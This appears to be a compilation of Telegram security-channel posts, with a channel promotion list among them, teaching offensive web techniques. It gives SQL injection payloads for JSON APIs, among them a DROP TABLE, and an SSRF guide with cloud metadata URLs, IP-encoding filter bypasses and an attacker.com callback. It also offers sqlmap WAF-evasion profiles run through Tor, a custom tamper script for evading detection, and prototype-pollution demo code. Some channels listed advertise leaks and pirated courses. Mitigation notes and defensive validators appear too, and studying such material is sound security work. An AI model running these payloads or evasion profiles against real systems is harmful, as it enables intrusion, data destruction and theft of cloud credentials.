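    if (BLOCKED.has(key)) continue;
    const val = src[key];
    if (val && typeof val === "object" && !Array.isArray(val)) {
      if (!hasOwn(target, key) || !target[key] || typeof target[key] !== "object") target[key] = {};
      safeMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Splits "a[b][c]" or "a.b.c" into segments, as a naive client-side query
// parser does when turning ?a[b]=v into nested objects.
function toPath(name) {
  return name.replace(/\]/g, "").split(/\[|\./).filter(Boolean);
}

// Unsafe setter: follows the path through any property, so a "__proto__"
// segment steps into Object.prototype and the final assignment lands there.
function unsafeSet(obj, name, value) {
  const path = toPath(name);
  let cur = obj;
  for (const seg of path.slice(0, -1)) {
    if (!cur[seg] || typeof cur[seg] !== "object") cur[seg] = {};
    cur = cur[seg];
  }
  cur[path[path.length - 1]] = value;
  return obj;
}

// Safe setter: each decoded segment is compared exactly against the reserved
// names and the whole pair is rejected on a match. "__pro__proto__to__" is
// just an ordinary own-property name here, so it cannot reach the prototype.
function safeSet(obj, name, value) {
  const path = toPath(name);
  if (path.some((seg) => BLOCKED.has(seg))) return obj;
  let cur = obj;
  for (const seg of path.slice(0, -1)) {
    if (!hasOwn(cur, seg) || !cur[seg] || typeof cur[seg] !== "object") cur[seg] = {};
    cur = cur[seg];
  }
  cur[path[path.length - 1]] = value;
  return obj;
}

// Simulates the /update handler from the post with a given merge function
// and reports whether an unrelated, freshly created object inherited isAdmin.
function simulateUpdate(mergeFn, jsonBody) {
  const defaults = { role: "user" };
  const result = mergeFn(mergeFn({}, defaults), JSON.parse(jsonBody));
  const leaked = ({}).isAdmin === true;
  delete Object.prototype.isAdmin; // undo any pollution so the demo is repeatable
  return { result, leaked };
}
```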
[https://t.me/ExploitQuest]
Forwarded from s4rrar
أهلاً وسهلاً بكم جميعاً،
هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني.
@end_k
@GlobalRedHat
@k7ali_linux
@ExploitQuest
@iiMrDark
@Wa3i_Tech
@codearabs
@darkcsc
هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني.
@end_k
قناتنا المشتركة والتي تحتوي على بثوث مباشرة ومحتوى مميز وغير مسبوق.@iiLinux
قناة عامة تقوم بنشر التقنيات العامة و تتميز بشروحات لينكس.
@GlobalRedHat
المجتمع الرسمي للقراصنة ذوي القبعة الحمراء.
@k7ali_linux
قناة تخص شروحات كالي لينكس بشكل مختلف ومتميز.
@ExploitQuest
قناة تهتم باكتشاف الثغرات و استغلالها بالإضافة إلى الشروحات المميزة فيها.@EgyptianshieldTOOLS
قناة خاصة بالأدوات المستخدمة في البرمجة والأمن السيبراني.
@iiMrDark
قناة تقدم محتوى خاص بالتسريبات والبرامج.
@Wa3i_Tech
قناة تقدم الوعي في الأمن السيبراني وشروحات مبسطة.
@codearabs
قناة مختصة بتسريب كورسات الشركات المشهورة في المجالات التقنية.@Egyshield
قناة مختصة بالشروحات والأخبار التقنية وتحديداً في البرمجة والأمن السيبراني.@Bad_Rabbit_Team
قناة Bad Rabbit – قناة متخصصة في الهجمات السيبرانية، تقدم شروحات عملية عن اختبار الاختراق، تحليل الثغرات، وأدوات الهجوم الإلكتروني.@GlobalRedTeam
المجتمع الرسمي لـGlobal Red Team
@darkcsc
قناة خاصة بعلم الحاسوب وتحتوي على شروحات تخص الحاسوب بشكل عام.
Welcome, everyone.
All of the channels above are available as one Telegram folder, "Meow ~ Onion" (10 chats): https://t.me/addlist/nD70sWRf83U4ZTA0
In the modern web, APIs are everywhere, powering everything from web apps and mobile apps to IoT devices. Developers still make the same classic mistakes when handling user input, especially in JSON-based RESTful APIs.
SQL Injection (SQLi) is far from obsolete: it survives inside APIs whenever a value taken from a JSON body is concatenated into a query instead of being bound as a parameter.
This article explores techniques for identifying and exploiting SQL injection in APIs, particularly in JSON payloads. It is written for penetration testers and bug bounty hunters who want to level up their API testing.
━━━━━━━━━━━━━━━
Where to look:
•POST requests with JSON bodies
•GraphQL endpoints
•PUT/PATCH methods with nested objects
•Endpoints with dynamic filters or search queries
Signs that an endpoint may be injectable:
•Database-related error messages in API responses
•Unusual delays in response (time-based blind SQLi)
•Reflection of user input in responses or logs
•Status code anomalies (e.g., 500 Internal Server Error)
━━━━━━━━━━━━━━━
Suppose you're testing the following API endpoint:
POST /api/user/details HTTP/1.1
Host: vulnerable.site
Content-Type: application/json
{
"username": "admin"
}
Try a tautology payload:
{
"username": "' OR '1'='1"
}
🤖Or blind time-based (MySQL; keep the space after -- , which MySQL requires before it treats -- as a comment):
{
"username": "' OR SLEEP(5)-- "
}
The same test from the command line. The payload's single quote must not collide with the shell's quoting, so the body is double-quoted here:
curl -X POST https://vulnerable.site/api/user/details \
-H "Content-Type: application/json" \
-d "{\"username\": \"' OR 1=1 -- \"}"
The same technique applies to filter parameters:
{
"filter": {
"email": "admin@site.com' OR '1'='1"
}
}
Or nested objects:
{
"user": {
"id": "1'; DROP TABLE users;--"
}
}
Stacked queries like the DROP TABLE example only run when the driver allows several statements per call, and they are destructive: never send them against a target you do not own.
Tools:
•Burp Suite (Pro): Use Intruder or Repeater to fuzz JSON payloads.
•SQLMap with the JSON body passed through --data (sqlmap detects JSON in the body on its own and asks whether to inject into its values, so no separate JSON flag is needed):
sqlmap -u https://vulnerable.site/api/login \
--data '{"user":"admin","pass":"pass"}' \
--headers="Content-Type: application/json" \
--level=5 --risk=3 --batch
•Postman: Manual testing and injection
•Nuclei with custom templates
━━━━━━━━━━━━━━━━━━
•Always analyze API docs (Swagger/OpenAPI) for parameter hints.
•Use Burp Collaborator for detecting out-of-band SQLi.
•Test for second-order injection, especially in multi-step flows.
•Try JSON-specific encoding, like:
•Unicode: \u0027 OR \u0031=\u0031 (the API's JSON parser decodes this to ' OR 1=1 before the value reaches the query, while a WAF matching on the raw body never sees a quote)
•Base64 in API params (only helps where the API base64-decodes the field itself before using it)
━━━━━━━━━━━━━━━━━━
🛡️ Mitigation (For Blue Team Awareness)
•Use parameterized queries / prepared statements
•Sanitize and validate input rigorously
•Apply WAF rules and anomaly detection for API behavior
•Implement rate limiting and access control
━━━━━━━━━━━━━━━━━━
SQL Injection is far from dead — it's just evolving. Modern APIs, especially those handling complex JSON bodies, often become attack vectors due to developer assumptions or insecure ORM usage. With the right mindset, tools, and techniques, ethical hackers can uncover and responsibly disclose serious vulnerabilities before attackers do.
Happy hacking and see you next time!
#CyberSecurity #MSSQL #EthicalHacking #json #api #JavaScriptSecurity #WebSecurity #BugBounty #SecurityResearch #WebHacking
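The behaviour the post above describes, as an added example that is not code from the original post: the /api/user/details endpoint rebuilt over an in-memory SQLite table, once with the JSON value spliced into the SQL string (the vulnerable shape) and once with a bound parameter, plus the JSON \u0027 decoding point from the tips. The table, its rows and the function names are constructed for this demo; sqlite3 has no SLEEP(), so the time-based payload is left out.

```python
"""
Added example, not code from the original post: the /api/user/details
endpoint from the text rebuilt over an in-memory SQLite table, once the way
the post describes (JSON value spliced into the SQL string) and once with a
bound parameter. The table, its rows and the handler names are constructed
for this demo; sqlite3 has no SLEEP(), so the time-based payload is omitted.
"""
import json
import sqlite3


def make_db():
    """Constructed sample data: three users, one of them an admin."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, email TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [(1, "admin", "admin@site.com", "admin"),
         (2, "alice", "alice@site.com", "user"),
         (3, "bob", "bob@site.com", "user")],
    )
    return conn


def lookup_vulnerable(conn, body):
    """The post's vulnerable shape: the JSON string becomes part of the SQL text,
    so a quote inside "username" closes the literal and the rest is parsed as SQL."""
    username = json.loads(body)["username"]
    sql = f"SELECT id, username, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, body):
    """Same endpoint with a parameterised query: the value is bound by the driver
    and can never be interpreted as SQL, whatever characters it contains."""
    username = json.loads(body)["username"]
    sql = "SELECT id, username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def filter_vulnerable(conn, body):
    """The nested "filter" object from the post, handled the same unsafe way."""
    email = json.loads(body)["filter"]["email"]
    sql = f"SELECT id, username FROM users WHERE email = '{email}'"
    return conn.execute(sql).fetchall()


def decoded_value(body, field="username"):
    """Why JSON escapes matter: the parser turns \\u0027 back into a quote before
    the value reaches the query, while a WAF inspecting the raw body sees none."""
    return json.loads(body)[field]


if __name__ == "__main__":
    db = make_db()
    tautology = '{"username": "\' OR \'1\'=\'1"}'
    print(lookup_vulnerable(db, '{"username": "admin"}'))   # the one admin row
    print(lookup_vulnerable(db, tautology))                  # all three rows
    print(lookup_fixed(db, tautology))                       # []: no such username
    escaped = '{"username": "\\u0027 OR \\u00271\\u0027=\\u00271"}'
    print(repr(decoded_value(escaped)))                      # "' OR '1'='1"
    print(len(lookup_vulnerable(db, escaped)))               # 3: same injection, invisible to a raw-body regex
```

Run it as a script to see the three outcomes side by side; the fixed handler returns nothing for the tautology because the whole string is compared as a username, which is exactly what a WAF rule cannot guarantee and a bound parameter can.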
Server-Side Request Forgery (SSRF) is a vulnerability in which a server can be made to issue a request to a URL derived from user input. Exploited, it leads to data leakage, access to internal systems, or even full infrastructure compromise.
Here's a step-by-step guide to discovering and exploiting SSRF vulnerabilities:
━━━━━━━━━━━━━━━━━━
Start by locating areas where the application sends outbound requests: any feature that fetches, previews, imports or renders a user-supplied URL or external content.
If HTML or external content is processed, injecting a URL you control can make the server request your endpoint, which confirms the outbound fetch.
Example (use a domain you own or a collaborator host; attacker.com is a real, unrelated domain):
<img src="http://attacker.com/payload"/>
━━━━━━━━━━━━━━━━━━
Test the server's behavior by sending malformed or unreachable URLs and observing the responses: differences in error messages, status codes or response time reveal whether the server actually attempted the outbound request.
Test Payloads:
http://invalid-url
http://example.local
http://127.0.0.1:9999
━━━━━━━━━━━━━━━━━━
Once confirmed, aim for internal IP ranges such as 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16.
These often expose admin panels, internal APIs, or development services. Port scanning via SSRF is also possible: open, closed and filtered ports usually produce different errors or response times.
Example:
http://127.0.0.1:8000/admin
━━━━━━━━━━━━━━━━━━
In cloud environments (AWS, Azure, GCP), internal metadata endpoints may leak sensitive info like access keys and tokens.
Payloads:
http://169.254.169.254/latest/meta-data
http://169.254.169.254/metadata/instance?api-version=2021-02-01
Be sure to include the headers each provider requires: Metadata: true for Azure, Metadata-Flavor: Google for GCP. On AWS, IMDSv2 requires a session token obtained with a PUT request first, so a GET-only SSRF reaches the metadata service only where IMDSv1 is still enabled.
━━━━━━━━━━━━━━━━━━
If filters are in place, send the same address in a form the filter does not recognise:
http://127%2E0%2E0%2E1 (percent-encoded dots)
http://2130706433 (decimal form of 127.0.0.1)
http://[::] (IPv6 unspecified address, which many stacks route to localhost)
Pro Tip: Use DNS rebinding or SSRF chaining with redirect-capable endpoints (an allowed host that 302s to an internal address).
━━━━━━━━━━━━━━━━━━
In blind SSRF cases, you won’t get visible feedback. Use external monitoring tools to detect interactions:
Example:
http://your-collaborator-url.com
Monitor for DNS or HTTP logs to confirm server-side interaction.
━━━━━━━━━━━━━━━━━━
That's all, friends!
Happy hacking and see you next time!
#BugBounty #ssrf #sqli #bypass
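The defensive side of the bypass section above, as an added example that is not part of the original post: a URL validator of the kind an SSRF filter should be, which parses the user-supplied URL, normalises the host through the disguised forms the post lists (percent-encoded dots, a bare decimal IP, bracketed IPv6, IPv4-mapped IPv6) and rejects anything pointing at loopback, link-local (including 169.254.169.254) or RFC 1918 space. The URLs in the demo are constructed; DNS is deliberately not resolved here, so a hostname must be re-checked at connect time and after every redirect in real code.

```python
"""
Added example, not code from the original post: an SSRF URL check that
normalises IP literals before deciding. Assumes nothing about the target
application; the sample URLs under __main__ are constructed for the demo.
"""
import ipaddress
from urllib.parse import urlsplit, unquote

ALLOWED_SCHEMES = {"http", "https"}


def normalise_host(host):
    """Return an ip_address object when the host is an IP literal in any of the
    common disguised forms, or None when it is a DNS name."""
    host = unquote(host)              # 127%2E0%2E0%2E1 -> 127.0.0.1
    host = host.strip("[]")           # [::] -> ::
    if host.isdigit():                # 2130706433 -> 127.0.0.1
        try:
            return ipaddress.ip_address(int(host))
        except ValueError:
            return None
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return None
    # ::ffff:127.0.0.1 is an IPv4 address in IPv6 clothing; judge the IPv4 part
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped
    return ip


def is_internal(ip):
    """Everything that must never be fetched on a user's behalf."""
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved or ip.is_multicast)


def check_url(url):
    """Return (allowed, reason). DNS names are passed through here and must be
    resolved and re-checked at connection time, including after redirects."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host"
    ip = normalise_host(host)
    if ip is None:
        return True, f"dns name {host}: resolve and re-check at connect time"
    if is_internal(ip):
        return False, f"{host} is internal address {ip}"
    return True, f"public address {ip}"


if __name__ == "__main__":
    for u in ("http://127%2E0%2E0%2E1/admin", "http://2130706433/", "http://[::]/",
              "http://[::ffff:127.0.0.1]/", "http://169.254.169.254/latest/meta-data",
              "file:///etc/passwd", "https://example.com/"):
        print(u, check_url(u))
```

Each of the post's bypass payloads is rejected once the host is normalised to an address object; the one the check cannot settle offline is a DNS name, which is why rebinding still has to be handled where the connection is made.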
Here's a powerful list of 💻 SQLMap preconfigured profiles you can use for stealthy SQL injection, especially when dealing with WAFs, rate limits, or intrusion detection systems (IDS/IPS).
These profiles combine SQLMap's most effective flags for stealth, evasion, and precision targeting. Two caveats apply to all of them: --risk=3 turns on OR-based payloads that can modify data if the injection point sits in an UPDATE or DELETE statement, and --level=5 multiplies the number of requests sent, which works against stealth. Start from the lowest values that find the bug and raise them only when needed.
✅ 1. Stealth Mode (WAF Bypass + Delay)
🔘 Use Case: Slow, stealthy testing to avoid WAF/IPS.
sqlmap -u "http://target.com/page.php?id=1" \
--random-agent \
--tamper=space2comment,between,charunicodeescape \
--delay=2 --timeout=10 \
--retries=5 \
--threads=1 \
--technique=BEUSTQ \
--level=3 --risk=2
━━━━━━━━━━━━━━━━━━
✅ 2. Aggressive Mode with WAF Evasion
🔘 Use Case: For deeper exploitation when stealth is less critical.
sqlmap -u "http://target.com/page.php?id=1" \
--random-agent \
--tamper=space2comment,charencode,unmagicquotes,versionedmorekeywords \
--level=5 --risk=3 \
--batch --threads=5 \
--technique=BEUSTQ
━━━━━━━━━━━━━━━━━━
✅ 3. Blind Time-Based SQLi Detection
🔘 Use Case: For blind injections using SLEEP, BENCHMARK, or pg_sleep. --technique=T restricts sqlmap to time-based tests and --time-sec=5 is the delay it expects to observe.
sqlmap -u "http://target.com/page.php?id=1" \
--random-agent \
--tamper=space2comment,modsecurityversioned,between \
--technique=T \
--time-sec=5 \
--level=5 --risk=3 \
--batch
━━━━━━━━━━━━━━━━━━
✅ 4. Obfuscated Payloads for Bypassing WAFs
🔘 Use Case: When facing intelligent WAFs that detect classic patterns.
sqlmap -u "http://target.com/page.php?id=1" \
--tamper=charunicodeescape,randomcase,space2comment,versionedkeywords \
--random-agent \
--level=5 --risk=3 \
--threads=1 --delay=1 \
--batch
━━━━━━━━━━━━━━━━━━
✅ 5. POST Parameter Injection with Custom Headers
🔘 Use Case: Testing login forms. The spoofed X-Forwarded-For header only helps when the WAF or the application trusts it as the client address.
sqlmap -u "http://target.com/login.php" \
--data="username=admin&password=1234" \
--method=POST \
--headers="X-Forwarded-For: 127.0.0.1" \
--random-agent \
--tamper=space2comment,charunicodeescape \
--level=5 --risk=3 \
--batch
━━━━━━━━━━━━━━━━━━
✅ 6. Using TOR with WAF Evasion
🔘 Use Case: Anonymous testing through TOR while bypassing WAF. --check-tor makes sqlmap verify that traffic really leaves through Tor before any payload is sent.
sqlmap -u "http://target.com/page.php?id=1" \
--tor --tor-type=SOCKS5 --check-tor \
--random-agent \
--delay=2 --timeout=10 \
--tamper=space2comment,charunicodeescape,modsecurityversioned \
--batch
━━━━━━━━━━━━━━━━━━
🔧 Recommended Tamper Scripts
| Tamper Script | Description
| ---------------------- | -------------------------------------------
| `space2comment` | Replaces spaces with inline comments (`/**/`)
| `charunicodeescape` | Unicode-escapes the not-yet-encoded characters of the payload (e.g. `SELECT` becomes `\u0053\u0045\u004C\u0045\u0043\u0054`)
| `randomcase` | Randomizes the case of SQL keywords
| `between` | Replaces `>` with `NOT BETWEEN 0 AND` and `=` with `BETWEEN # AND #`
| `versionedkeywords` | Wraps each non-function keyword in a MySQL versioned comment (`/*!...*/`)
| `equaltolike` | Replaces `=` with `LIKE`
| `unmagicquotes` | Replaces `'` with the multi-byte sequence `%BF%27` and appends a comment (magic_quotes/addslashes bypass)
| `modsecurityversioned` | Wraps the whole query in a MySQL versioned comment, aimed at ModSecurity
💡 Bonus: Create a Custom Profile Alias
You can create a .sqlmap_profile file to reuse flags:
# ~/.sqlmap_profile
--random-agent
--tamper=space2comment,charunicodeescape
--level=5
--risk=3
--threads=1
--delay=1
--timeout=10
--retries=3
--technique=BEUSTQ
Then run:
sqlmap -u "http://target.com/page.php?id=1" @~/.sqlmap_profile
Check that your sqlmap version accepts the @file form before relying on it; the documented way to reuse a set of options is a configuration file passed with -c (the repository ships a sqlmap.conf template), and the same settings can be moved there.
That's all, friends!
Happy hacking and see you next time!🎁
#BugBounty #ssrf #sqli #bypass
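The tamper scripts the profiles above lean on are plain Python files that sqlmap loads with --tamper=/path/to/script.py, and writing your own is the usual answer once a WAF has fingerprinted the stock ones. As an added example that is not code from the original post or from the sqlmap project, here is a custom tamper in sqlmap's script format that combines the two transformations the post uses most, space-to-comment and random keyword case, so you can see exactly what the WAF receives. The PRIORITY import is wrapped so the file also runs outside sqlmap; the keyword list and the optional rng argument are choices made for this demo.

```python
"""
Added example, not code from the original post or from sqlmap itself: a
custom tamper script in the layout sqlmap expects (module-level
__priority__, optional dependencies(), and tamper(payload, **kwargs)).
Save it anywhere and pass --tamper=/path/to/this_file.py.
"""
import random
import re

try:
    from lib.core.enums import PRIORITY       # present when sqlmap loads the script
except ImportError:                           # stand-alone run outside sqlmap
    class PRIORITY:
        NORMAL = 0

__priority__ = PRIORITY.NORMAL

# Keywords whose case gets scrambled (demo choice); string literals and
# identifiers are left exactly as sqlmap produced them.
KEYWORDS = ("SELECT", "UNION", "FROM", "WHERE", "AND", "OR", "SLEEP", "NULL", "LIMIT")
KEYWORD_RE = re.compile(r"\b(" + "|".join(KEYWORDS) + r")\b", re.IGNORECASE)


def dependencies():
    """Hook sqlmap calls on load; nothing extra is needed for this script."""
    pass


def random_case(payload, rng):
    """Randomise the case of every known keyword, like sqlmap's randomcase."""
    def scramble(match):
        return "".join(rng.choice((ch.upper(), ch.lower())) for ch in match.group(0))
    return KEYWORD_RE.sub(scramble, payload)


def space_to_comment(payload):
    """Replace every space with an inline comment, like sqlmap's space2comment."""
    return payload.replace(" ", "/**/")


def tamper(payload, **kwargs):
    """Entry point sqlmap invokes for each payload; kwargs normally carry the
    request headers. An optional rng lets a caller seed the randomness."""
    if not payload:
        return payload
    rng = kwargs.get("rng") or random.Random()
    return space_to_comment(random_case(payload, rng))


if __name__ == "__main__":
    for p in ("1 AND SLEEP(5)", "1' OR 'a'='a", "1 UNION SELECT NULL,NULL"):
        print(p, "->", tamper(p))
```

Because the keyword match is anchored on word boundaries, ORDER is not touched when OR is in the list, and quoted literals such as 'a' keep their case, which matters for databases that compare strings case-sensitively.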
Mirror the target site locally with wget:
wget --mirror --convert-links --adjust-extension --page-requisites --no-parent http://target.com
Add --wait and --random-wait, or --limit-rate, to keep the crawl gentle: the mirroring itself is a burst of requests, and target.com here stands for a host you are authorized to test.
With a local copy you can:
•Analyze JavaScript files for hidden secrets, tokens, or API endpoints
•Discover hidden or forgotten pages like /admin, /test, etc. 🕵️
•Search HTML comments for sensitive dev notes
•Browse and inspect the full site offline, so the analysis itself sends no further requests that could trip WAFs or rate limits
# Developer comments
grep -Ri "<!--" target.com
# API endpoints
grep -Ri "api" target.com
# Endpoints referenced from JavaScript
python3 LinkFinder.py -i index.html -o cli
That's all, friends!
Happy hacking and see you next time!
#BugBounty #ssrf #sqli #bypass #wget
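The offline analysis step that follows the mirror, as an added example that is not part of the original post: three shell functions that scan a mirror directory for developer comments, API paths referenced from JavaScript, and assignments that look like embedded keys or tokens, which go further than a bare grep for "api" or "<!--". The mirror directory built by make_sample_mirror is constructed in a temp dir with invented content so the script runs without a network; point the functions at your real wget output directory instead.

```shell
#!/bin/sh
# Added example, not from the original post: offline triage of a wget --mirror
# directory. The sample mirror below is constructed for the demo.

# Print every HTML comment in the mirror (comments spanning lines are joined).
find_dev_comments() {
    dir="$1"
    find "$dir" -type f -name '*.html' -exec cat {} + |
        tr '\n' ' ' | grep -oE '<!--([^-]|-[^-])*-->'
}

# Print distinct /api/... paths referenced as string literals in JavaScript.
find_api_paths() {
    dir="$1"
    find "$dir" -type f -name '*.js' -exec grep -ohE '"/api/[A-Za-z0-9_/.-]+"' {} + |
        tr -d '"' | sort -u
}

# Print assignments whose name looks like a key/token/secret and whose value
# is a quoted string of at least 8 characters.
find_secret_candidates() {
    dir="$1"
    find "$dir" -type f \( -name '*.js' -o -name '*.html' \) -exec \
        grep -ohiE '(api_?key|token|secret)[a-z_]*[[:space:]]*[:=][[:space:]]*"[^"]{8,}"' {} + |
        sort -u
}

# Build a constructed mirror directory with sample content and print its path.
make_sample_mirror() {
    dir=$(mktemp -d)
    mkdir -p "$dir/static"
    cat > "$dir/index.html" <<'EOF'
<html><!-- TODO: remove /admin-old before launch --><body>
<script src="static/app.js"></script></body></html>
EOF
    cat > "$dir/static/app.js" <<'EOF'
const API_KEY = "sk_live_4f9c2d8e1a7b3c6d";
fetch("/api/v2/users").then(r => r.json());
fetch("/api/internal/export");
EOF
    echo "$dir"
}

# Usage: sh this_script.sh --demo   (or source it and call the functions on
# your own mirror directory, e.g. find_api_paths target.com)
if [ "${1:-}" = "--demo" ]; then
    m=$(make_sample_mirror)
    echo "== comments";  find_dev_comments "$m"
    echo "== api paths"; find_api_paths "$m"
    echo "== secrets";   find_secret_candidates "$m"
    rm -rf "$m"
fi
```

The secret pattern is deliberately loose; expect false positives and review the hits by hand, but a match like the sample API_KEY line is exactly what LinkFinder and a plain grep for "api" would let through.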